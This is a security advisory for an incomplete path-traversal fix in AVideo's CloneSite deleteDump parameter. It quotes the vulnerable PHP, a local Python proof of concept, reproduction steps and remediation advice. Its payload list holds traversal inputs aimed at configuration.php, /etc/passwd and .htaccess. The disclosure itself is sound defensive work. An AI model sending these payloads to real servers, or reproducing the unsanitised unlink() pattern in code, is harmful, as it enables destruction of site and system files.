CVE-2026-41058
WWBN AVideo has an incomplete fix for CVE-2026-33293: Path Traversal
Description
### Summary The incomplete fix for AVideo's CloneSite `deleteDump` parameter does not apply path traversal filtering, allowing `unlink()` of arbitrary files via `../../` sequences in the GET parameter. ### Affected Package - **Ecosystem:** Other - **Package:** AVideo - **Affected versions:** < commit 941decd6d19e - **Patched versions:** >= commit 941decd6d19e ### Details At line 44-48 of `cloneServer.json.php` (pre-fix): ```php if (!empty($_GET['deleteDump'])) { $resp->error = !unlink("{$clonesDir}{$_GET['deleteDump']}"); $resp->msg = "Delete Dump {$_GET['deleteDump']}"; die(json_encode($resp)); } ``` No `basename()`, no `realpath()` check, no path traversal filtering. `$_GET['deleteDump']` is concatenated directly with `$clonesDir`. The vulnerable code has zero protection against path traversal: - No `basename()` to strip directory components - No `realpath()` to validate the final path - No check that resolved path is within `$clonesDir` - No `../` sanitization - Additionally, `exec()` calls with `mysqldump` pass credentials on the command line ### PoC ```python """ CVE-2026-33293 - AVideo CloneSite Path Traversal """ import sys import os VULN_SRC = os.path.join(os.path.dirname(__file__), "src", "cloneServer.json.php") def verify_source_file(): if not os.path.isfile(VULN_SRC): print("ERROR: Source not found at %s" % VULN_SRC) sys.exit(1) with open(VULN_SRC, "r") as f: src = f.read() if "unlink(" not in src or "deleteDump" not in src: print("ERROR: Expected patterns not found") sys.exit(1) return src def vulnerable_delete_path(clones_dir, delete_dump): return clones_dir + delete_dump def test_path_traversal(): clones_dir = "/var/www/html/AVideo/videos/clones/" payloads = [ ("../../configuration.php", "Delete site configuration"), ("../../../etc/passwd", "Delete system file"), ("../../.htaccess", "Delete .htaccess"), ] print("Testing path traversal via deleteDump parameter:") print("Base clones_dir: %s" % clones_dir) print() all_traversal = True for payload, desc in payloads: resolved = vulnerable_delete_path(clones_dir, payload) real_resolved = os.path.normpath(resolved) escaped = not real_resolved.startswith(os.path.normpath(clones_dir)) if escaped: print("[+] TRAVERSAL: %s" % desc) print(" Payload: deleteDump=%s" % payload) print(" unlink() target: %s" % resolved) print(" Normalized: %s" % real_resolved) else: all_traversal = False return all_traversal def main(): print("=" * 70) print("CVE-2026-33293: AVideo CloneSite Path Traversal PoC") print("=" * 70) print() src = verify_source_file() print("[+] Source file verified: %s" % VULN_SRC) for line in src.split('\n'): if 'unlink(' in line and 'deleteDump' in line: print("[+] Vulnerable line: %s" % line.strip()) break print() if test_path_traversal(): print("\nVULNERABILITY CONFIRMED") sys.exit(0) else: print("\nVULNERABILITY NOT CONFIRMED") sys.exit(1) if __name__ == "__main__": main() ``` ```bash python3 poc.py ``` **Steps to reproduce:** 1. `git clone https://github.com/WWBN/AVideo /tmp/AVideo_test` 2. `cd /tmp/AVideo_test && git checkout 941decd6d19e2e694acb75e86317d10fbb560284~1` 3. `python3 poc.py` **Expected output:** ``` VULNERABILITY CONFIRMED The deleteDump parameter passes unsanitized path traversal sequences (../../) directly to unlink(), enabling arbitrary file deletion. ``` ### Impact An attacker can delete arbitrary files on the server. Deleting `configuration.php` takes the site offline. Deleting `.htaccess` exposes protected directories. Deleting system files can affect other services. ### Suggested Remediation Use `basename($_GET['deleteDump'])` to strip directory components. Validate that `realpath()` of the final path is within `$clonesDir`. Validate file extension. Add authentication checks.